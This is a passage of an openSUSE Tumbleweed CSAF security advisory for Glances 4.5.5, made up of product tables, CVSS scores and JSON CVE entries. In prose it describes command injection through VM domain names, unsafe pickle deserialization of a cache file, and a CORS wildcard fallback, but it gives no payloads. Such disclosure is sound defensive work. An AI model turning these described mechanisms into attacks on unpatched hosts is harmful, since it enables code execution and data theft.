Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.4 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
17 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
